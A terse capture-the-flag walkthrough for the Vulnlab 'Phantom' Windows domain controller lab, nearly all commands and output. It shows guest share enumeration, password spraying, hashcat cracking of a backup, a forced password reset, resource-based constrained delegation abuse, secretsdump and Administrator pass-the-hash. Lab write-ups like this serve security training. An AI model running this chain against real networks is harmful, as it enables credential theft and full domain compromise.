vulnlab-phantom
a medium windows machine
┌──(puck㉿kali)-[~/vulnlab/phantom] └─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares SMB dc.phantom.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False) SMB dc.phantom.vl 445 DC [+] phantom.vl\guest: SMB dc.phantom.vl 445 DC [+] Enumerated shares SMB dc.phantom.vl 445 DC Share Permissions Remark SMB dc.phantom.vl 445 DC ----- ----------- ------ SMB dc.phantom.vl 445 DC ADMIN$ Remote Admin SMB dc.phantom.vl 445 DC C$ Default share SMB dc.phantom.vl 445 DC Departments Share SMB dc.phantom.vl 445 DC IPC$ READ Remote IPC SMB dc.phantom.vl 445 DC NETLOGON Logon server share SMB dc.phantom.vl 445 DC Public READ SMB dc.phantom.vl 445 DC SYSVOL Logon server share
.
crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt| cut -d '\' -f2 | awk '{print $1}' | tee users.txt
.
smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public Password for [GUEST\phantom.vl]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Jul 11 17:03:14 2024 .. DHS 0 Sun Jul 7 10:39:30 2024 tech_support_email.eml A 14565 Sat Jul 6 18:08:43 2024 6127103 blocks of size 4096. 1181062 blocks available smb: \> get tech_support_email.eml getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec) smb: \>
EML view gives
Welcome to Phantom! Dear <NAME> We are excited to have you on board. Below are your user credentials: Username: <USERNAME> Password: Ph<redacted>t! Please log in to your account using these credentials. For security reasons, we strongly recommend that you change your password immediately after your first login. If you have any questions or need assistance, feel free to reach out to our support team at techsupport@phantom.vl Best regards, The Phant
.
crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce
hashcat to find pass for verasign file
hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus
found in backup file /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/ lstanley gB<redacted>Rc
.
crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success
.
crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp
Here comes the fun
net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"
.
crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 SMB dc.phantom.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False) LDAP dc.phantom.vl 389 DC [+] phantom.vl\crose:Summer2024
.
crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq SMB dc.phantom.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False) LDAP dc.phantom.vl 389 DC [+] phantom.vl\crose:Summer2024 MAQ dc.phantom.vl 389 DC [*] Getting the MachineAccountQuota MAQ dc.phantom.vl 389 DC MachineAccountQuota: 0
Let’s delegate
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] crose can now impersonate users on DC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126) export KRB5CCNAME=cross.ccache
over-pass-the-hash
impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Saving ticket in crose.ccache export KRB5CCNAME=cross.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key' [*] Ticket Session Key : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra =============================================================================== Warning: This functionality will be deprecated in the next Impacket version =============================================================================== [*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Accounts allowed to act on behalf of other identity: [*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126) [*] crose can already impersonate users on DC$ via S4U2Proxy [*] Not modifying the delegation rights. [*] Accounts allowed to act on behalf of other identity: [*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126) export KRB5CCNAME=cross.ccache
.
impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Impersonating Administrator [*] Requesting S4U2self+U2U [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache export KRB5CCNAME=cAdministrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
.
impacket-secretsdump -k dc.phantom.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::
.
evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'
That was fun.